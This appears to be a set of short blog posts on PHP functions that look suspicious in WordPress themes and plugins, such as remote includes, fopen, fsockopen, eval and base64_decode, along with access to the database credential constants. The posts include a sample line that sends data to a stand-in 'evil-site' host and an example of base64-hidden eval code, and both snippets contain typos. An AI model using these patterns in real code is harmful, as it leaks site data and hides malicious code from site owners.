Dec 10
When allow_url_include is turned on, the PHP function include can be used to insert remote files into your scripts.
Plugins shouldn’t include remote files, and themes especially have no reason.
Dec 10
The PHP functions fopen, file_get_contents, file, and readfile can be used to read files on remote servers when allow_url_fopen is turned on. Although the functions can’t be used to data to the server directly, they can be used to pass query arguments that may contain private data. As an example:
fopen('http://www.evil-site.com/?p=‘);
It’s possible that a plugin might need to open remote files, but themes never should.
Dec 09
The PHP functions fsockopen and pfsockopen are used to open internet connections. The functions can be used to pass private information to remote servers.
The use of the function is normal in plugins, but there’s little reason for a theme to use them.
Dec 09
PHP has many functions for writing to files, and it’s perfectly normal for plugins to use those functions. However there’s little reason for a theme to use any of them.
Dec 09
The eval PHP function is used to evaluate PHP code at run time. It’s normal for plugins to use the function, and in same rare circumstances a theme might need to use it too.
Dec 09
The variables that WordPress uses for connecting to the database are stored in the constants DB_USER, DB_PASSWORD, DB_HOST, and DB_NAME. There’s little reason for either plugins or themes to be looking at those values.
Dec 09
Dec 09
The base64_decode function can be used to hide sneaky programming code. Suspicious code can be base64 encoded, and then executed in a theme in the following manner:
evel(base64_decode('ZGllKCk='));
A normal user might notice a theme trying to do something suspicious, but when the malicious code is base64 encoded, it might go unnoticed. It might be normal for a plugin to use the function, but it’s unlikely that any theme would.
Recent Comments